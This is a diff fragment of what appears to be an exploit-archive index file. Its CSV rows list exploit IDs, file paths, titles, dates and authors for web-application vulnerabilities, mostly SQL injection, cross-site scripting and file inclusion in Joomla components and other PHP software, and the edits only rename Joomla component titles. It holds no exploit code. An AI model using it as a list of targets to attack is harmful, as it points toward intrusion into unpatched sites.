34149,platforms/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0
|
||||
34159,platforms/php/webapps/34159.txt,"Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
|
||||
34159,platforms/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
|
||||
34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0
|
||||
34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0
|
||||
34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
|
||||
|
|
@ -33426,7 +33427,7 @@ id,file,description,date,author,platform,type,port
|
|||
34389,platforms/php/webapps/34389.txt,"Impact Software AdPeeps - Cross-Site Scripting / HTML Injection",2010-07-27,Matt,php,webapps,0
|
||||
34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0
|
||||
34392,platforms/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0
|
||||
34393,platforms/php/webapps/34393.txt,"Joomla! Component 'com_jigsaw' - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0
|
||||
34393,platforms/php/webapps/34393.txt,"Joomla! Component com_jigsaw - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0
|
||||
34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0
|
||||
34397,platforms/asp/webapps/34397.txt,"Activedition - 'activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0
|
||||
34497,platforms/php/webapps/34497.txt,"ViArt Helpdesk - reviews.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0
|
||||
|
|
@ -33483,12 +33484,12 @@ id,file,description,date,author,platform,type,port
|
|||
34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php' redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
|
||||
34475,platforms/php/webapps/34475.txt,"Joomla! Component Weblinks - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
|
||||
34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Cross-Site Scripting",2010-08-15,10n1z3d,php,webapps,0
|
||||
34477,platforms/php/webapps/34477.txt,"Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
|
||||
34477,platforms/php/webapps/34477.txt,"Joomla! Component com_fireboard - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
|
||||
34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps,0
|
||||
34481,platforms/php/webapps/34481.txt,"123 Flash Chat - Multiple Vulnerabilities",2010-08-16,Lincoln,php,webapps,0
|
||||
34482,platforms/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone - 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0
|
||||
34483,platforms/php/webapps/34483.txt,"Nasim Guest Book - 'page' Parameter Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0
|
||||
34484,platforms/php/webapps/34484.txt,"Joomla! Component 'com_dirfrm' - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0
|
||||
34484,platforms/php/webapps/34484.txt,"Joomla! Component com_dirfrm - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0
|
||||
34485,platforms/php/webapps/34485.txt,"FreeSchool - 'key_words' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0
|
||||
34486,platforms/php/webapps/34486.txt,"phpCMS 2008 - 'download.php' Information Disclosure",2009-10-19,Securitylab.ir,php,webapps,0
|
||||
34487,platforms/php/webapps/34487.txt,"Facil Helpdesk - kbase/kbase.php URI Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0
|
||||
|
|
@ -33774,7 +33775,7 @@ id,file,description,date,author,platform,type,port
|
|||
34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
|
||||
34922,platforms/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
|
||||
35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35024,platforms/php/webapps/35024.txt,"Joomla! Component 'com_catalogue' - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
|
||||
35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
|
||||
34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - /riddles/results.php searchQuery Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0
|
||||
34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - /riddles/list.php catid Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0
|
||||
34904,platforms/php/webapps/34904.txt,"Radvision Scopia - 'entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0
|
||||
|
|
@ -33885,12 +33886,12 @@ id,file,description,date,author,platform,type,port
|
|||
35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0
|
||||
35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0
|
||||
35088,platforms/php/webapps/35088.txt,"PHP State - 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0
|
||||
35089,platforms/php/webapps/35089.txt,"Joomla! Component 'com_jeformcr' - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0
|
||||
35090,platforms/php/webapps/35090.txt,"Joomla! Component 'com_jesectionfinder' - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0
|
||||
35089,platforms/php/webapps/35089.txt,"Joomla! Component Jeformcr - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0
|
||||
35090,platforms/php/webapps/35090.txt,"Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0
|
||||
35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0
|
||||
35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Parameter Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
|
||||
35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha - 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35096,platforms/php/webapps/35096.txt,"Joomla! Component 'com_mailto' - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
|
||||
35096,platforms/php/webapps/35096.txt,"Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
|
||||
35097,platforms/php/webapps/35097.txt,"Joomla! Component 'com_redirect' 1.5.19 - Local File Inclusion",2010-12-13,jos_ali_joe,php,webapps,0
|
||||
35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
|
||||
35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
|
||||
|
|
@ -33921,7 +33922,7 @@ id,file,description,date,author,platform,type,port
|
|||
35131,platforms/php/webapps/35131.txt,"Social Share - 'Username' Parameter SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35133,platforms/php/webapps/35133.txt,"WordPress Plugin Mediatricks Viva Thumbs - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0
|
||||
35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0
|
||||
35135,platforms/php/webapps/35135.txt,"Joomla! Component 'com_classified' - SQL Injection",2010-12-22,R4dc0re,php,webapps,0
|
||||
35135,platforms/php/webapps/35135.txt,"Joomla! Component Classified - SQL Injection",2010-12-22,R4dc0re,php,webapps,0
|
||||
35136,platforms/php/webapps/35136.txt,"WordPress Plugin Accept Signups 0.1 - 'email' Parameter Cross-Site Scripting",2010-12-22,clshack,php,webapps,0
|
||||
35137,platforms/php/webapps/35137.txt,"Social Share - 'vote.php' HTTP Response Splitting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - Cross-Site Scripting",2014-11-02,evi1m0,php,webapps,0
|
||||
|
|
@ -33960,7 +33961,7 @@ id,file,description,date,author,platform,type,port
|
|||
35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0
|
||||
35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0
|
||||
35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Parameter Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0
|
||||
35295,platforms/php/webapps/35295.txt,"Joomla! Component 'com_frontenduseraccess' - Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0
|
||||
35295,platforms/php/webapps/35295.txt,"Joomla! Component com_frontenduseraccess - Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0
|
||||
35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0
|
||||
35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
|
||||
35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0
|
||||
|
|
@ -34010,7 +34011,7 @@ id,file,description,date,author,platform,type,port
|
|||
35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80
|
||||
35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
|
||||
35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
|
||||
35294,platforms/php/webapps/35294.txt,"Joomla! Component 'com_clan_members' - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0
|
||||
35294,platforms/php/webapps/35294.txt,"Joomla! Component com_clan_members - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0
|
||||
35300,platforms/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
|
||||
35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2014-11-19,LiquidWorm,php,webapps,80
|
||||
35303,platforms/php/webapps/35303.txt,"WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80
|
||||
|
|
@ -34212,7 +34213,7 @@ id,file,description,date,author,platform,type,port
|
|||
35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0
|
||||
35626,platforms/php/webapps/35626.txt,"Easy File Sharing WebServer 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0
|
||||
35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0
|
||||
35630,platforms/php/webapps/35630.txt,"Joomla! Component 'com_phocadownload' - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
|
||||
35630,platforms/php/webapps/35630.txt,"Joomla! Component com_phocadownload - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
|
||||
35631,platforms/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",php,webapps,0
|
||||
35632,platforms/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
|
||||
35633,platforms/php/webapps/35633.txt,"Ultra Marketing Enterprises CMS and Cart - Multiple SQL Injections",2011-04-19,eXeSoul,php,webapps,0
|
||||
|
|
@ -34281,7 +34282,7 @@ id,file,description,date,author,platform,type,port
|
|||
35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injection",2011-05-10,"High-Tech Bridge SA",php,webapps,0
|
||||
35739,platforms/php/webapps/35739.txt,"Argyle Social - Multiple Cross-Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0
|
||||
35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0
|
||||
35745,platforms/php/webapps/35745.txt,"Joomla! Component 'com_cbcontact' - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
|
||||
35745,platforms/php/webapps/35745.txt,"Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
|
||||
35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps,0
|
||||
35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0
|
||||
35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0
|
||||
|
|
@ -34303,7 +34304,7 @@ id,file,description,date,author,platform,type,port
|
|||
35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross-Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0
|
||||
35783,platforms/php/webapps/35783.html,"Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0
|
||||
35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0
|
||||
35788,platforms/php/webapps/35788.txt,"Joomla! Component 'com_maplocator' - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0
|
||||
35788,platforms/php/webapps/35788.txt,"Joomla! Component Map Locator - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0
|
||||
35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0
|
||||
35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting",2011-05-24,"High-Tech Bridge SA",php,webapps,0
|
||||
35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 - Multiple SQL Injections",2011-05-30,KedAns-Dz,php,webapps,0
|
||||
|
|
@ -34322,7 +34323,7 @@ id,file,description,date,author,platform,type,port
|
|||
35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
|
||||
35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
|
||||
35984,platforms/php/webapps/35984.txt,"Joomla! Component 'com_virtualmoney' 1.5 - SQL Injection",2011-07-25,FL0RiX,php,webapps,0
|
||||
35826,platforms/php/webapps/35826.txt,"Joomla! Component 'com_ccboard' - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0
|
||||
35826,platforms/php/webapps/35826.txt,"Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0
|
||||
35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0
|
||||
35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes Themes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,php,webapps,0
|
||||
35831,platforms/php/webapps/35831.txt,"PopScript - 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0
|
||||
|
|
@ -34357,7 +34358,7 @@ id,file,description,date,author,platform,type,port
|
|||
35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication Bypass",2015-01-22,"Manish Tanwar",php,webapps,0
|
||||
35879,platforms/php/webapps/35879.txt,"WordPress Plugin Cforms 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0
|
||||
35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0
|
||||
35883,platforms/php/webapps/35883.txt,"Joomla! Component 'com_morfeoshow' - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0
|
||||
35883,platforms/php/webapps/35883.txt,"Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0
|
||||
35884,platforms/php/webapps/35884.txt,"Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
|
||||
35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0
|
||||
35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080
|
||||
|
|
@ -34381,7 +34382,7 @@ id,file,description,date,author,platform,type,port
|
|||
35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80
|
||||
35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0
|
||||
35916,platforms/php/webapps/35916.txt,"WordPress Plugin Photo Gallery 1.2.5 - Unrestricted Arbitrary File Upload",2014-11-11,"Kacper Szurek",php,webapps,80
|
||||
35922,platforms/php/webapps/35922.txt,"Joomla! Component 'com_jr_tfb' - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0
|
||||
35922,platforms/php/webapps/35922.txt,"Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0
|
||||
35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0
|
||||
35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0
|
||||
35927,platforms/php/webapps/35927.txt,"Classified Script - c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0
|
||||
|
|
@ -34400,12 +34401,12 @@ id,file,description,date,author,platform,type,port
|
|||
35950,platforms/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80
|
||||
35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
|
||||
35955,platforms/php/webapps/35955.txt,"Easy Estate Rental - 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
|
||||
35956,platforms/php/webapps/35956.txt,"Joomla! Component 'com_foto' - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
|
||||
35958,platforms/php/webapps/35958.txt,"Joomla! Component 'com_juicy' - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
|
||||
35959,platforms/php/webapps/35959.txt,"Joomla! Component 'com_hospital' - SQL Injection",2011-07-15,SOLVER,php,webapps,0
|
||||
35960,platforms/php/webapps/35960.txt,"Joomla! Component 'com_controller' - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
|
||||
35956,platforms/php/webapps/35956.txt,"Joomla! Component Foto - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
|
||||
35958,platforms/php/webapps/35958.txt,"Joomla! Component Juicy Gallery - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
|
||||
35959,platforms/php/webapps/35959.txt,"Joomla! Component com_hospital - SQL Injection",2011-07-15,SOLVER,php,webapps,0
|
||||
35960,platforms/php/webapps/35960.txt,"Joomla! Component Controller - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
|
||||
35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 - search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
|
||||
35966,platforms/php/webapps/35966.txt,"Joomla! Component 'com_newssearch' - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
|
||||
35966,platforms/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
|
||||
35967,platforms/php/webapps/35967.txt,"AJ Classifieds - 'listingid' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
|
||||
35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0
|
||||
35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0
|
||||
|
|
@ -34429,7 +34430,7 @@ id,file,description,date,author,platform,type,port
|
|||
36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL - 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,asp,webapps,0
|
||||
36011,platforms/asp/webapps/36011.txt,"Ataccan E-Ticaret Scripti - 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0
|
||||
36012,platforms/php/webapps/36012.txt,"Joomla! Component 'com_xeslidegalfx' - 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
|
||||
36015,platforms/php/webapps/36015.txt,"Joomla! Component 'com_community' - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
|
||||
36015,platforms/php/webapps/36015.txt,"Joomla! Component com_community - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
|
||||
36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0
|
||||
36018,platforms/php/webapps/36018.txt,"WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0
|
||||
36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting",2011-08-04,PontoSec,asp,webapps,0
|
||||
|
|
@ -34543,7 +34544,7 @@ id,file,description,date,author,platform,type,port
|
|||
36166,platforms/php/webapps/36166.txt,"WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscriber HTML Injection",2011-09-26,knull,php,webapps,0
|
||||
36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0
|
||||
36168,platforms/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0
|
||||
36171,platforms/php/webapps/36171.txt,"Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
|
||||
36171,platforms/php/webapps/36171.txt,"Joomla! Component Biitatemplateshop - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
|
||||
36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0
|
||||
36173,platforms/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0
|
||||
36175,platforms/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injections / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",php,webapps,0
|
||||
|
|
@ -34577,10 +34578,10 @@ id,file,description,date,author,platform,type,port
|
|||
36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
|
||||
36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0
|
||||
36214,platforms/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
|
||||
36215,platforms/php/webapps/36215.txt,"Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
|
||||
36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
|
||||
36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0
|
||||
36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36221,platforms/php/webapps/36221.txt,"Joomla! Component 'com_br' - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36222,platforms/php/webapps/36222.txt,"Joomla! Component 'com_shop' - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0
|
||||
36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps,0
|
||||
|
|
@ -34744,7 +34745,7 @@ id,file,description,date,author,platform,type,port
|
|||
36469,platforms/php/webapps/36469.txt,"Joomla! Component 'com_tsonymf' - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
|
||||
36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0
|
||||
36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 - Multiple Cross-Site Scripting / SQL Injection",2011-12-20,"High-Tech Bridge SA",php,webapps,0
|
||||
36472,platforms/php/webapps/36472.txt,"Joomla! Component 'com_caproductprices' - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
|
||||
36472,platforms/php/webapps/36472.txt,"Joomla! Component com_caproductprices - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
|
||||
